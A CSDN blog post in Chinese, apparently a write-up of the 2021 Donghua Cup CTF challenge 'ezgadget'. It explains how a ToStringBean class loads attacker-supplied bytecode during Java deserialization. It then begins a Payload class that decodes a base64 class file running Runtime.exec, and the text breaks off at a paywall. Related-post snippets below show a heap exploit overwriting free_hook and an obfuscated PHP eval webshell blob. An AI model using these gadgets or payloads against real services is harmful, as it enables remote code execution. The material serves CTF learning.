[东华杯2021] ezgadget

最新推荐文章于 2024-09-14 22:11:27 发布
最新推荐文章于 2024-09-14 22:11:27 发布
阅读量620 收藏
点赞数
分类专栏: JAVA安全 文章标签: java spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/128118344
版权
本文详细分析了ezgadget的漏洞,涉及动态字节码加载、对象反序列化及命令执行。通过ToStringBean类的定义ClassByte实现任意代码执行,结合IndexController中的逻辑,利用Base64解密和ObjectInputStream的readObject方法,触发BadAttributeValueExpException的重写readObject方法,最终实现命令执行。文章提供了复现环境配置和POC,展示了漏洞利用过程。
摘要由CSDN通过智能技术生成

复现环境配置:

链接:https://pan.baidu.com/s/1t5-fV7SUETDEI5-qbZZQrw 
提取码:8do5

运行

java -jar ezgadget.jar

访问127.0.0.1:8888就可以了

分析:

ToStringBean.java

package com.ezgame.ctf.tools;

import java.io.Serializable;

public class ToStringBean extends ClassLoader implements Serializable {
    private byte[] ClassByte;

    public String toString() {
        com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
        Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
        Object Obj = null;
        try {
            Obj = clazz.newInstance();
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
        return "enjoy it.";
    }
}

该类继承了 serializeable 接口和 ClassLoader 接口,说明可以字节码动态加载,并且在toString 方法中,看到了 defineClass . 就可以任意代码执行,这里的ClassByte 可控,那我们就可以执行命令字节码文件,构造一个 字节码类:

构造代码:

public class Payload {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException {

        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAKRXhjZXB0aW9ucwcAGgEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEAHENvbW1vbnNDb2xsZWN0aW9uczMvRXZpbFRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAGQAAAAQAAAABsQAAAAEACgAAAAYAAQAAAA4ACwAAAAQAAQAMAAEABwANAAIACQAAABkAAAADAAAAAbEAAAAB
最低0.47元/天 解锁文章
snowlyzz
关注
专栏目录
【pwn】2021 东华(部分)
woodwhale的博客
10-31 3637
【pwn】2021 东华(部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
东华2021 ezgadget复现
Sk1y的博客
04-01 1021
东华2021 ezgadget复现 文章目录东华2021 ezgadget复现环境搭建源码分析exp参考链接 环境搭建 题目给了ezgadget附件,需要自取 链接:https://pan.baidu.com/s/1mZt_aorU_kZDo-GJH4wwxQ 提取码:tmng 运行(需要有java环境) java -jar ezgadget.jar 源码分析 我们把附件扔进jd-gui,文件不是很多 mark一下:我在本地复现的时候,用idea创建的一个maven项目,没有用模板,然后将jd-gui
[2021东华]Web Writeup1
08-03
[2021东华]Web Writeup1
[2021东华]Web Writeup
feng的博客
11-01 3624
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
[2021东华]JK战队WP1
08-03
在分析这个【2021东华】JK战队WP1的题目时,我们可以看到它涉及到的是一个Java安全和反序列化漏洞的利用问题。主要的知识点包括: 1. **反序列化**: 反序列化是将之前序列化的对象状态恢复为可操作的对象的过程...
东华2021 Crypto writeups
weixin_56678592的博客
11-07 660
东华2021 Crypto writeups #1 fermat’s revenge 题目: from Crypto.Util.number import * f = open('flag.txt', 'rb') m = bytes_to_long(f.read()) f.close() e = 65537 p = getPrime(1024) q = getPrime(1024) n = p * q c = pow(m, e, n) hint = pow(1010 * p + 1011, q, n) f
2021年全国大学生网络安全邀请赛暨第七届“东华“上海市大学生网络安全大赛Writeup
Le1a's Blog
11-01 9671
2021年全国大学生网络安全邀请赛暨第七届"东华"上海市大学网格全大赛Writeup Misc checkin 题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flag flag为: flag{dhb_7th} project 下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip 解压得到你来了~ 这里面一共有三段数据,第一段是base64编码 6KGo5oOF5YyF5paH5YyW77y
[Java反序列化]—CommonsCollections5
snowlyzz的博客
11-29 348
CC5分析
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 65万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
c++中vector向量几种情况的总结(向量指针,指针的向量)
s9434的博客
04-03 54万+
1.标准库vector类型 vector 是同一种类型的对象的集合,每个对象都有一个对应的整数索引值。标准库将负责管理与存储元素相关的内存。我们把 vector 称为容器,是因为它可以包含其他对象。一个容器中的所有对象都必须是同一种类型的。 用 vector之前,必须包含相应的头文件。 #include using std::vector; vector 是一个类模板(class te
Java-网络
2301_81543552的博客
09-14 333
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
Android Studio 2024与2022 解决Read timed out和connect timed out的问题
2301_80035882的博客
09-14 329
如果在新建Android项目时报错:Read timed out或者connect timed out。
Java Exception 异常相关总结
最新发布
持续学习和分享感兴趣的技术
09-14 134
Java Exception 异常的相关总结。
上传文件到钉盘流程详解
jspyth的博客
09-14 412
本文详解如何通过钉钉的API实现上传文件到钉盘目录,代码通过JAVA实现。
Java集合:Stack详解
yang_brother的博客
09-10 591
Java 中的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码中不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
记录开发一个英语听力训练网站
业余程序员Blue的博客
09-14 380
目前只导入了雅思历年真题的听力音频,作为我日常练习英语听力的素材足够了。网站的主要功能其实就是英语句子精听,核心目的就是反复听每一句话,直到听懂为止,我觉得听力训练也没有太多技巧可言,就是老老实实地坚持去听,所谓网上经常说的“磨耳朵”吧。基于此,听力页面主要功能有:播放/暂停、上一句/下一句、播放次数选择、播放倍速选择、字体大小选择、是否显示原文、是否显示译文、是否自动播放下一句。而这些功能,基本上都是页面js操作。
"2021东华Web Writeup1:EzGadget反序列化漏洞分析
2021东华Web Writeup1比赛中,EzGadget提供了源码并打开了IDEA进行分析。在源码中发现了一个反序列化的漏洞点:在ToStringBean这个类的unser方法中,通过"/readobject"接口接收data参数并进行反序列化操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值